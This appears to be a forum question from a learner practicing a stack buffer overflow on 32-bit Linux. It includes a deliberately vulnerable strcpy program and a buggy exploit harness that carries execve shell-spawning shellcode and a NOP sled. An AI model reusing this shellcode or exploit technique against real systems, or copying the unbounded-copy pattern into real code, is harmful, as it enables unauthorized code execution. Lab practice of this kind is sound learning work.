
I've been practicing some basic stack-based buffer overflow tasks recently, and I wrote a vulnerable program like this:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * Deliberately vulnerable demo program for the exercise.
 *
 * Copies argv[1] into a fixed 400-byte stack buffer with an unbounded
 * strcpy(), so an argument of 400 or more characters overruns buf (the
 * NUL terminator is copied too) and corrupts the stack frame.  A hardened
 * version would use a bounded copy such as
 * snprintf(buf, sizeof buf, "%s", argv[1]) and reject over-long input.
 *
 * Returns 0 after printing the greeting; exits with status 0 (not an
 * error status) when no argument is supplied.
 */
int main(int argc,char **argv)
{
        if (argc<2) {
                puts("Need enough args!!");
                exit(0);                /* exit status 0 even though nothing was done */
        }

        char buf[400];
        strcpy(buf,argv[1]);            /* unbounded copy: overflows buf when strlen(argv[1]) >= 400 */
        printf("Hi, %s\n",buf);
        return 0;
}

and the exploit program like this:

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#define ATK_L 430
#define VUL_L 400
#define NOP_L 12

/*
 * Test harness: builds a 430-byte payload in a heap buffer, appends it to
 * a command string and hands the result to system().
 *
 * The harness has memory-safety bugs of its own, called out inline below:
 * the fill loop writes past the end of atk, and strcat() copies the whole
 * payload into the 8-byte stack array vul.  Either can crash this program
 * before the target is ever launched.
 */
int main(){
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"   /* 28 raw machine-code bytes (contents not analysed here) */
                "\x68\x68\x2f\x62\x69\x6e\x89"
                "\xe3\x89\xc1\x89\xc2\xb0\x0b"
                "\xcd\x80\x31\xc0\x40\xcd\x80";

    char *atk,vul[]="./vul1 ";                  /* vul is exactly 8 bytes: "./vul1 " plus the NUL */
    atk=(char*)malloc(sizeof(char)*ATK_L);      /* 430 bytes; the result is never checked for NULL */
    unsigned long i,ret,*ptr,ptr2;

    ret=(unsigned long)atk;                     /* heap address of atk itself, used as the fill value */
    ptr=(unsigned long*)atk;

    /* Fill atk with copies of ret.  Each store writes sizeof(unsigned long)
     * bytes while i only advances by 4, and ATK_L (430) is not a multiple
     * of 4, so the last iteration (i == 428) stores bytes 428..431 and
     * runs past the 430-byte allocation even with 4-byte longs.  With
     * 8-byte longs every store is twice the assumed width and the overrun
     * is far larger (heap corruption). */
    for(i=0;i<ATK_L;i+=4){
        *(ptr++)=ret;
    }

    /* First NOP_L (12) bytes: 0x90 sled. */
    for(i=0;i<NOP_L;i++){
        atk[i]='\x90';
    }

    /* Bytes 12..39: the shellcode, copied one byte at a time. */
    ptr2=0;
    for(i=NOP_L;i<NOP_L+strlen(shellcode);i++){
        atk[i]=shellcode[ptr2++];
    }
    atk[ATK_L-1]='\0';                          /* terminate so atk is a C string for strcat() */

    /* BUG: appends up to 429 bytes to the 8-byte stack array vul, smashing
     * this program's own stack frame.  The crash observed inside
     * system()/getenv() is most likely a consequence of this overflow. */
    strcat(vul,atk);

    system(vul);                                /* runs the command line through the shell */

    free(atk);

    return 0;   
}

Since I don't want to determine the offset, I just jump back to the beginning of the atk array. I turned off ASLR and added the -fno-stack-protector flag when compiling, but when I run the exploit program it just reports a core dump and does nothing. I used gdb to debug the exploit program and it said the process was killed inside the getenv function, and I can't understand why.

I'm working on Ubuntu 11.10, 32-bit.

Thanks a lot :-)

